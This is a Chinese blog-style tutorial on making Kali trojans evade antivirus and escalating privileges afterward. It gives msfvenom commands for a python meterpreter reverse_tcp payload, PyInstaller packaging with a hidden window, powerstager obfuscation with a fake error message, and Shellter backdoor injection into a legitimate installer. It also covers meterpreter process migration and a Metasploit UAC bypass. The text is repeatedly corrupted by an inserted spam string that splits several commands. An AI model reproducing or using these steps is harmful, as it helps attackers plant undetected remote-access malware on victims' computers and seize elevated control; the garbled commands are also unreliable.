Kali木马免杀，权限提升（kali本地木马免杀）

   由于现在版本的木马查杀工具更新之快，木马在计算机上基本是裸奔的，再好的免杀技术也逃不过工具的查杀，下面是我研究很久的本地木马免杀，基本都是网上的百度总结，把可以是实现免杀的木马生成进行了总结。

免杀成功SEO靠我1（由于使用的是python载荷，由于权限问题，部分命令不可用）

使用pyinstall，先生成py再转换成exe文件

1.生成py文件

msfvenom -p python/meterpreter/revSEO靠我erse_tcp lhost=192.168.137.44 lport=4444 -f raw -o shell.py

把py文件导入到windows机器，此处略去了环境的配置，百度pyinstalleSEO靠我r的安装和使用后看第二步。

2.使用pypinsatller（使用pip安装）转换成exe文件，使用时需进入到Script目录下

Script目录下

命令

生成exe文件时建议使用以下命令(参数解释：-F为打SEO靠我包一个py文件，-w为执行时隐藏窗口)

./pyinstaller.exe -F -w ./shell.py

显示successfully就表示转换成exe文件成功

免杀成功2

利用powerstager制作SEO靠我免杀木马

(1)python 工具

apt-get install python3 apt-get install mingw-w64

因缺少names包，需安装pip再安装names包

apSEO靠我t-get install python3-pip pip3 install names

(2)先克隆再安装

git clone https://github.com/z0noxz/powSEO靠我erstager cd powerstager sudo ./setup.py install

win32:命令一样，下面的win64改成win32就可

win64:

pytSEO靠我hon3 powerstager.py -m -t win64 --lhost=192.168.0.104 --lport=4444 -o /root/桌面/test.exe –obfuscationSEO靠我 –fake-error=”error:The program terminated due to an error”

（我感觉上面的几个属性标签没啥卵用啊）

免杀效果：

very important：msSEO靠我f载荷使用 windows/x64/meterpreter/reverse_tcp

ps：(若无法运行powerstager则需要安装wine64，可以运行此步骤可直接省略)

安装wine 64：

sudoSEO靠我 dpkg --add-architecture i386 sudo apt-get update  sudo apt-get install wine:i386 SEO靠我 sudo apt-get install wine-bin:i386

免杀成功3

shelter免杀（只能过火绒和腾讯电脑管家，360动态查杀掉）

shelter仅支持绑定32位的程序，使用npSEO靠我pinstaller.exe作为木马程序

安装shellter apt-get update apt-get install shellter

插件安装：

dpkg --add-architecture iSEO靠我386 && apt-get update && apt-get install wine32 启动并使用

启动：进入安装目录，窗口输入shellter即可启动

使用：

（选择模式 A 自动模式自动注入后门SEO靠我，M高级模式，H帮助）

输入A

PE Target:程序路径

是否启动隐身模式：Y

、

设置payload，先输入L选择payload，然后再输入攻击机ip和端口

使用进程迁移来解决点击错误信息后断连情况(可自行SEO靠我百度msf进程迁移)

以下两种进程迁移选择其一即可，上为指定进程迁移，下为自动的进程迁移，默认迁移到notepad.exe。

set autorunscript migrate -n explorer.eSEO靠我xe set autorunscript -f

攻击成功后的权限提升

Msf绕过uac提升权限

更换渗透模块 use exploit/windows/local/bypassuac 设置session

2.提SEO靠我高权限